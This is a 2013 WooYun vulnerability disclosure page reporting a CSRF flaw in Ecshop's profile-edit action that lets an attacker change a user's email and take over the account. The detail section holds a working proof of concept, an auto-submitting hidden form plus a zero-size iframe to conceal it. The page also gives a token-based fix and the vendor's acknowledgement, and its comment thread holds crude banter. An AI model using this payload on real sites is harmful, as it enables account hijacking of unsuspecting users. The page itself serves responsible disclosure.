当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024625

漏洞标题:Ecshop csrf可劫持用户账号

相关厂商:ShopEx

漏洞作者: VIP

提交时间:2013-05-27 20:02

修复时间:2013-08-25 20:02

公开时间:2013-08-25 20:02

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-27: 细节已通知厂商并且等待厂商处理中
2013-05-27: 厂商已经确认,细节仅向厂商公开
2013-05-30: 细节向第三方安全合作伙伴开放
2013-07-21: 细节向核心白帽子及相关领域专家公开
2013-07-31: 细节向普通白帽子公开
2013-08-10: 细节向实习白帽子公开
2013-08-25: 细节向公众公开

简要描述:

详细说明:

修改个人信息处未验证token,可通过一个精心构造的表单强制用户修改邮箱,达到劫持用户的目的,劫持用户账号只需要欺骗目标用户点击一个链接。
POC:

<form id="csrf" action="http://127.0.0.1/ecshop/user.php" method="POST">
<input type="hidden" name="email" value="root@wooyun.org">
<input type="hidden" name="extend_field1" value="x@x.com">
<input type="hidden" name="extend_field2" value="123123">
<input type="hidden" name="extend_field3" value="11111111">
<input type="hidden" name="extend_field4" value="11111111">
<input type="hidden" name="extend_field5" value="11111111111">
<input type="hidden" name="sel_question" value="friend_birthday">
<input type="hidden" name="passwd_answer" value="x">
<input type="hidden" name="act" value="act_edit_profile">
</form>
<script>csrf.submit()</script>


欺骗用户访问后,会自动提交表单,修改用户邮箱。

漏洞证明:

访问前

01.jpg


访问时

02.jpg


访问后(邮箱被修改)

03.jpg


然而,访问这个表单,自动提交后,会跳转到修改成功的页面,被用户看到,这显然不是我们想要的结果。所以,作为一个完美主义者,我们可以准备另一个正常的页面(如一个新闻页面),然后iframe 这个POC,并且height=0,width=0,这样用户可能就会在不经意之间被劫持账号了,代码如下:

<iframe src="POC.htm" height="0" width="0"></iframe>


劫持成功后,就可以去修改密码喽

04.jpg

修复方案:

涉及用户信息的操作都应该验证随机的token

版权声明:转载请注明来源 VIP@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-05-27 20:08

厂商回复:

感谢您为shopex安全做的贡献
我们会尽快处理
非常感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2013-05-27 20:37 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @xsser 这个算prize吗?:)

  2. 2013-05-27 20:39 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:70 | 我心中有猛虎,细嗅蔷薇。)

    @VIP 小朋友,估计够找个阿姨替你写作业的money了~~

  3. 2013-05-27 22:33 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @blue @VIP Tokyo Hot n0749 VIPの文教师_中出し專屬デビュ→ もぎたてfresh!ミクロリ

  4. 2013-05-27 22:38 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    额..... 话说 VIP 基友 今天好像说开启了挖洞模式- -..

  5. 2013-05-27 22:39 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    额..... 话说 VIP 基友 今天好像说开启了挖洞模式- -.. 用错马甲了= =!!

  6. 2013-05-27 22:40 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @z7y 滚粗,敢登老子账户偷老子WB!!!!!!

  7. 2013-05-27 22:42 | 『 Change_era 』 ( 路人 | Rank:18 漏洞数:1 | 追逐时代的脚步,奋斗向上,努力先前进。)

    额..... 话说 VIP 基友 今天好像说开启了挖洞模式- -.. 用错马甲了 = =!!

  8. 2013-05-27 23:40 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    额..... 话说 VIP 基友 今天好像说开启了挖洞模式- -.. 用错马甲了 = =!!

  9. 2013-06-17 11:57 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    这种crsf一抓一大把! 都能5rank 我勒个去。。。